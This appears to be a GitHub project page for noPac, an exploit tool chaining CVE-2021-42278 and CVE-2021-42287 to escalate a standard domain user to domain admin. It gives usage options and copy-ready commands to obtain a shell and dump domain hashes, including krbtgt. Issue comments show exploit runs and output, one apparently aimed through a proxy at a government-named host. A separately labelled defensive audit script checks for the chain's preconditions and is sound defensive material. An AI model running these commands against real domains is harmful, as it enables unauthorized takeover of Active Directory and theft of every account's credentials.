Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

About

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Modified from sam-the-admin.

Usage

SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain

positional arguments:
  [domain/]username[:password]
                        Account used to authenticate to DC.

optional arguments:
  -h, --help            show this help message and exit
  --impersonate IMPERSONATE
                        target username that will be impersonated (through S4U2Self) for querying the ST. Keep in mind this will only work if the identity provided in this script is allowed for delegation to the SPN specified
  -domain-netbios NETBIOSNAME
                        Domain NetBIOS name. Required if the DC has multiple domains.
  -new-name NEWNAME     Name of the computer account to add; if not specified, a random name will be generated.
  -debug                Turn DEBUG output ON
  -ts                   Adds timestamp to every logging output
  -shell                Drop a shell via smbexec
  -dump                 Dump hashes via secretsdump
  -use-ldap             Use LDAP instead of LDAPS

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-host hostname     Hostname of the domain controller to use. If omitted, the domain part (FQDN) specified in the account parameter will be used
  -dc-ip ip             IP of the domain controller to use. Useful if you can't resolve the FQDN specified in the account parameter

execute options:
  -port [destination port]
                        Destination port to connect to SMB Server
  -mode {SERVER,SHARE}  mode to use (default SHARE, SERVER needs root!)
  -share SHARE          share where the output will be grabbed from (default ADMIN$)
  -shell-type {cmd,powershell}
                        choose a command processor for the semi-interactive shell
  -codec CODEC          Sets encoding used (codec) from the target's output (default "GBK").
  -service-name service_name
                        The name of the service used to trigger the payload

dump options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state
  -use-vss              Use the VSS method instead of the default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using -use-vss). Default: smbexec

Note: If -dc-host is not specified, the tool will automatically look up the domain controller hostname; when more than one is found, select the hostname of the host you specified with -dc-ip. If --impersonate is not specified, the tool will randomly choose a domain admin to impersonate. LDAPS is used by default; if you get an SSL error, try adding -use-ldap.

GetST

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203

Auto get shell

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator 

Dump hash

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt

Scanner

python scanner.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203
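The scanner above checks a domain from the tester's side. As an added defensive counterpart (example code written for this page, not part of the noPac project), the following Python audits the two preconditions the chain relies on and that show up in the tool output quoted further down: a non-zero ms-DS-MachineAccountQuota, and computer objects whose sAMAccountName lacks the trailing '$' or collides with a domain controller's name. The record layout (one dict per LDAP object), the use of primaryGroupID 516 to recognise domain controllers, and the sample directory entries are assumptions constructed for the example; feed it the output of your own LDAP export.

```python
"""Audit a domain's exposure to the CVE-2021-42278 / CVE-2021-42287 chain.

Checks (defensive, read-only):
  * ms-DS-MachineAccountQuota > 0 lets any authenticated user create computer
    objects; the recommended hardening is to set it to 0.
  * A computer object whose sAMAccountName has no trailing '$', or whose name
    matches a domain controller's, is the footprint CVE-2021-42278 relies on.

Input records are LDAP-style attribute dicts. SAMPLE_COMPUTERS below is a
constructed example, not data from a real directory.
"""
from dataclasses import dataclass
from typing import Iterable, List

DC_PRIMARY_GROUP_ID = 516  # well-known RID of the "Domain Controllers" group


@dataclass(frozen=True)
class Finding:
    dn: str       # object the finding applies to ("<domain>" for domain-wide)
    code: str     # short machine-readable reason
    detail: str   # human-readable explanation


def base_name(sam: str) -> str:
    """Computer account name without the trailing '$', case-folded."""
    return sam.strip().rstrip("$").casefold()


def audit_quota(maq: int) -> List[Finding]:
    """Flag a MachineAccountQuota that lets ordinary users add computers."""
    if maq > 0:
        return [Finding("<domain>", "MAQ_NONZERO",
                        f"ms-DS-MachineAccountQuota is {maq}; any authenticated "
                        f"user may add computer objects (recommended value: 0)")]
    return []


def audit_computers(computers: Iterable[dict]) -> List[Finding]:
    """Flag computer objects with a missing '$' or a DC-name collision."""
    computers = list(computers)
    # Domain controllers are identified by primaryGroupID 516 (assumption for
    # this example; adjust if your export exposes DC membership differently).
    dc_names = {base_name(c["sAMAccountName"]) for c in computers
                if c.get("primaryGroupID") == DC_PRIMARY_GROUP_ID}
    findings: List[Finding] = []
    for c in computers:
        sam, dn = c["sAMAccountName"], c["dn"]
        is_dc = c.get("primaryGroupID") == DC_PRIMARY_GROUP_ID
        if not sam.endswith("$"):
            findings.append(Finding(dn, "NO_DOLLAR",
                                    f"sAMAccountName {sam!r} has no trailing '$'"))
        if not is_dc and base_name(sam) in dc_names:
            findings.append(Finding(dn, "DC_NAME_COLLISION",
                                    f"sAMAccountName {sam!r} matches a domain "
                                    f"controller's name"))
    return findings


def audit(computers: Iterable[dict], maq: int) -> List[Finding]:
    """Run every check and return the findings in a stable order."""
    return audit_quota(maq) + audit_computers(computers)


# Constructed sample directory: one DC, one normal workstation, and one
# computer object renamed to the DC's name without the '$'.
SAMPLE_COMPUTERS = [
    {"dn": "CN=DC1,OU=Domain Controllers,DC=lab,DC=local",
     "sAMAccountName": "DC1$", "primaryGroupID": 516},
    {"dn": "CN=WS01,CN=Computers,DC=lab,DC=local",
     "sAMAccountName": "WS01$", "primaryGroupID": 515},
    {"dn": "CN=WIN-ABC123,CN=Computers,DC=lab,DC=local",
     "sAMAccountName": "dc1", "primaryGroupID": 515},
]
SAMPLE_MAQ = 10  # the default value on a freshly installed domain

if __name__ == "__main__":
    for f in audit(SAMPLE_COMPUTERS, SAMPLE_MAQ):
        print(f"[{f.code}] {f.dn}: {f.detail}")
```

Run it as-is to see the three findings for the constructed sample; in practice, export computer objects with the sAMAccountName, dn and primaryGroupID attributes and read ms-DS-MachineAccountQuota from the domain naming context. A NO_DOLLAR or DC_NAME_COLLISION hit is worth treating as an incident indicator rather than a misconfiguration, because legitimate tooling does not strip the '$'.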

Comments
  • SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)


    Hello, I got this error when I try to execute this command :

    python3 noPac.py lgds.local/alex.henry:'123+aze' -dc-ip 192.168.130.100 -dc-host dc -shell --impersonate root2 -use-ldap

    target system : Windows Server 2022 (Sept 2021)

    Strange, because I have an SMB share on this target lab.

    Have you any idea how to resolve this issue?

    Best regards,

    opened by archidote 8
  • STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.


    Hello, I got this error when I try to execute this command :

    python3 noPac.py lgds.local/alex.henry:'123+aze' -dc-ip 192.168.130.101 -dc-host dc-ws16 -shell --impersonate root2 -use-ldap

    target system : Windows Server 2016 (Build version : 14393.1884 )

    Strange, because I have an SMB share on this target lab, and ADDS/DNS roles (linked to my lab domain)

    Windows Defender does not flag anything....

    Lab configuration :

    dc.lgds.local (ws22) : 192.168.130.100
    dc-ws16.lgds.local (ws16) : 192.168.130.101
    kali linux : 192.168.130.128

    Have you got any idea ?

    Best regards,

    opened by archidote 1
  • [-] Pls use full domain name, such as: domain.com/username


    My domain looks like this: sub1.sub0.domain.com. I guess the issue might be in this line (109):

    check_domain = ".".join(domain_dumper.getRoot().replace("DC=","").split(","))

    opened by sas060 1
  • [-] Missing required parameter 'digestmod'.


    Good afternoon,

    Everything was working properly yesterday.. today I got the following error:

    ─$ python3 noPac.py 'domain.local'/user:'password' -dc-ip 172.16.2.x -dc-host dc-hostname --impersonate administrator -dump -use-ldap -debug
    
    ███    ██  ██████  ██████   █████   ██████ 
    ████   ██ ██    ██ ██   ██ ██   ██ ██      
    ██ ██  ██ ██    ██ ██████  ███████ ██      
    ██  ██ ██ ██    ██ ██      ██   ██ ██      
    ██   ████  ██████  ██      ██   ██  ██████ 
                                               
                                            
        
    [+] Impacket Library Installation Path: /home/kali/.local/lib/python3.9/site-packages/impacket
    Traceback (most recent call last):
      File "/home/kali/Toys/noPac/noPac.py", line 385, in <module>
        samtheadmin(username, password, domain, options)
      File "/home/kali/Toys/noPac/noPac.py", line 95, in samtheadmin
        ldap_server, ldap_session = init_ldap_session(options, domain, username, password, lmhash, nthash)
      File "/home/kali/Toys/noPac/utils/helper.py", line 255, in init_ldap_session
        return init_ldap_connection(target, args.use_ldap, args, domain, username, password, lmhash, nthash)
      File "/home/kali/Toys/noPac/utils/helper.py", line 242, in init_ldap_connection
        ldap_session = ldap3.Connection(ldap_server, user=user, password=password, authentication=ldap3.NTLM, auto_bind=True)
      File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 321, in __init__
        self.do_auto_bind()
      File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 338, in do_auto_bind
        self.bind(read_server_info=True)
      File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 563, in bind
        response = self.do_ntlm_bind(controls)
      File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 1302, in do_ntlm_bind
        request = bind_operation(self.version, 'SICILY_RESPONSE_NTLM', ntlm_client, result['server_creds'])
      File "/usr/local/lib/python3.9/dist-packages/ldap3/operation/bind.py", line 81, in bind_operation
        server_creds = name.create_authenticate_message()
      File "/usr/local/lib/python3.9/dist-packages/ldap3/utils/ntlm.py", line 379, in create_authenticate_message
        nt_challenge_response = self.compute_nt_response()
      File "/usr/local/lib/python3.9/dist-packages/ldap3/utils/ntlm.py", line 485, in compute_nt_response
        response_key_nt = self.ntowf_v2()
      File "/usr/local/lib/python3.9/dist-packages/ldap3/utils/ntlm.py", line 497, in ntowf_v2
        return hmac.new(password_digest, (self.user_name.upper() + self.user_domain).encode('utf-16-le')).digest()
      File "/usr/lib/python3.9/hmac.py", line 170, in new
        return HMAC(key, msg, digestmod)
      File "/usr/lib/python3.9/hmac.py", line 56, in __init__
        raise TypeError("Missing required parameter 'digestmod'.")
    TypeError: Missing required parameter 'digestmod'.
    [-] Missing required parameter 'digestmod'.
    
    
    
    
    opened by rockabillycat666 1
  • SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME - The name provided is not a properly formed account name.


    Running noPac against 2016 DC and receiving the following error. Tried hard-coding the machine account name and password with no success.

    └─# python3 /opt/noPac/noPac.py domain/user:'password' -dc-ip 192.168.1.12

    ███    ██  ██████  ██████   █████   ██████ 
    ████   ██ ██    ██ ██   ██ ██   ██ ██      
    ██ ██  ██ ██    ██ ██████  ███████ ██      
    ██  ██ ██ ██    ██ ██      ██   ██ ██      
    ██   ████  ██████  ██      ██   ██  ██████ 

    [*] Current ms-DS-MachineAccountQuota = 10
    [*] We have more than one target, Pls choices the hostname of the -dc-ip you input.
    [*] 0: dc1
    [*] 1: dc2

    Your choice: 0
    [*] Selected Target dc1.domain.local
    [*] Total Domain Admins 7
    [*] will try to impersonat admin
    [*] Adding Computer Account "WIN-AJKEBM3GBHT"
    [*] MachineAccount "WIN-AJKEBM3GBHT" password = j2ZLU0Y@7uOL
    [-] SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME - The name provided is not a properly formed account name.

    opened by sm00v 1
  • maq=0 Method 1 test failed


    Tested on 2008 and 2012 domain controllers; I looked for a user that has write rights on the computer object, and the test failed:

    C:\Users\Administrator\Desktop>AdFind.exe -b "CN=Computers,DC=xxx,DC=com" -sc getacls -sddlfilter ;;"[WRT PROP]";;computer;xxx\test -recmute

    AdFind V01.52.00cpp Joe Richards ([email protected]) January 2020

    Using server: AD.xxx.com:389 Directory: Windows Server 2012 R2

    dn:CN=win7,CN=Computers,DC=xxx,DC=com

    nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];Logon Information;computer;BOSS\test
    nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];description;computer;xxx\test
    nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];displayName;computer;xxx\test
    nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];sAMAccountName;computer;xxx\test

    python.exe nopac.py xxx.com/test:Admin123 -dc-ip 192.168.xxx.xxx -dc-host ad.xxx.com --impersonate administrator -no-add -new-name win7$ -use-ldap

    [*] Current ms-DS-MachineAccountQuota = 0
    [*] win7$ already exists! Using force mode.
    {'attributes': {'ms-DS-MachineAccountQuota': [], 'objectSid': ['S-1-5-21-722558688-90111164-1262859035-2608']}, 'dn': 'CN=win7,CN=Computers,DC=xxx,DC=com'}
    {'result': 53, 'description': 'unwillingToPerform', 'dn': '', 'message': '0000001F: SvcErr: DSID-031A12D2, problem 5003 (WILL_NOT_PERFORM), data 0\n\x00', 'referrals': None, 'type': 'modifyResponse'}
    [-] Cannot change the machine password , exit.

    Do the computer account and the domain user need any special configuration?

    opened by ki11y0u 1
  • Why

    Why "automatic bind not successful - invalidCredentials" error?

    Hi, thanks for the upload. I tried a different user but get the same error.

    PS C:\tools\NOPAC\noPac-main\noPac-main> python noPac.py contoso.com/user01:'P@ssw0rd' -dc-ip 192.168.200.100

    automatic bind not successful - invalidCredentials


    opened by RENYONGTONG 1
  • Update noPac.py


    Include uppercase variant of 'domain' in conditional on line 100 since 'namingcontexts' for 'DC=*' via ldap reply is in uppercase. I figure this line is 'script kiddie proof', and may also teach those learning the industry (such as myself) to diagnose why a tool isn't working. I figured it wouldn't hurt to suggest it. Awesome tool, by the way.

    opened by Business1sg00d 0
  • Clock skew too great


    When I try to exploit Active Directory it returns this error. I use Kali Linux 2021. Please help....

    GetTGT error, error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

    opened by DerXanRam 1
  • [-] SAMR SessionError: code: 0xc00002a7 - STATUS_DS_NO_RIDS_ALLOCATED - The directory service was unable to allocate a relative identifier.


    Running noPac against 2019 DC and receiving the following error:

    #:proxychains4 python3 noPac.py xxx/user:'password' -dc-ip 10.10.10.140 -dc-host ad01 -shell --impersonate administrator
    [proxychains] config file found: /etc/proxychains.conf
    [proxychains] preloading /usr/lib/libproxychains4.so
    [proxychains] DLL init: proxychains-ng 4.16-git-4-g04023d3

    ███    ██  ██████  ██████   █████   ██████ 
    ████   ██ ██    ██ ██   ██ ██   ██ ██      
    ██ ██  ██ ██    ██ ██████  ███████ ██      
    ██  ██ ██ ██    ██ ██      ██   ██ ██      
    ██   ████  ██████  ██      ██   ██  ██████ 

    [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.10.140:389 ... OK
    [*] Current ms-DS-MachineAccountQuota = 10
    [*] Selected Target AD01.nasa.gov
    [*] will try to impersonat administrator
    [*] Adding Computer Account "WIN-GQ5YXH1Y39S$"
    [*] MachineAccount "WIN-GQ5YXH1Y39S$" password = ^%rX!ZNIV#0v
    [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.10.140:135 ... OK
    [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.10.140:445 ... OK
    [-] SAMR SessionError: code: 0xc00002a7 - STATUS_DS_NO_RIDS_ALLOCATED - The directory service was unable to allocate a relative identifier.

    opened by L0serH4 0
Owner: Evi1cg
Keep a calm, quiet and unhurried mind; unmoved by honour or disgrace, untroubled by what comes and goes.